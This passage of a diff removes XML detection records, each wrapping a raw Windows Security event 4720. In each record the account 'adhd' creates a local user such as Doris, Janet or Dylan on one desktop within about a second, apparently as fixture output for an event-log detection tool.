Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Doris</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4909</recordid>
-            <time>2020-06-11 22:05:05.46866100Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:05:05.0468661Z'/&gt;&lt;EventRecordID&gt;4909&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='8088'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Janet&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1144&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Janet&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Janet</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4903</recordid>
-            <time>2020-06-11 22:05:04.946612100Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:05:04.9466121Z'/&gt;&lt;EventRecordID&gt;4903&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='8284'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Samuel&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1143&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Samuel&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Samuel</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4897</recordid>
-            <time>2020-06-11 22:05:04.860667100Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:05:04.8606671Z'/&gt;&lt;EventRecordID&gt;4897&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='8284'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Dylan&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1142&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Dylan&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Dylan</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4891</recordid>
-            <time>2020-06-11 22:05:04.784894500Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:05:04.7848945Z'/&gt;&lt;EventRecordID&gt;4891&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='788'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Jordan&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1141&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Jordan&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Jordan</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4885</recordid>
-            <time>2020-06-11 22:05:04.685115700Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:05:04.6851157Z'/&gt;&lt;EventRecordID&gt;4885&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='8284'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Janice&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1140&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Janice&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Janice</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4879</recordid>
-            <time>2020-06-11 22:05:04.607083400Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:05:04.6070834Z'/&gt;&lt;EventRecordID&gt;4879&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='8088'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Angela&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1139&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Angela&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Angela</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4873</recordid>
-            <time>2020-06-11 22:05:04.524242000Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:05:04.5242420Z'/&gt;&lt;EventRecordID&gt;4873&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='8284'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Marie&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1138&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Marie&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Marie</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4867</recordid>
-            <time>2020-06-11 22:05:04.450190500Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:05:04.4501905Z'/&gt;&lt;EventRecordID&gt;4867&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='8284'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Richard&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1137&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Richard&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Richard</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4861</recordid>
-            <time>2020-06-11 22:05:04.365748900Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:05:04.3657489Z'/&gt;&lt;EventRecordID&gt;4861&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='792'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Dorothy&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1136&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Dorothy&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data 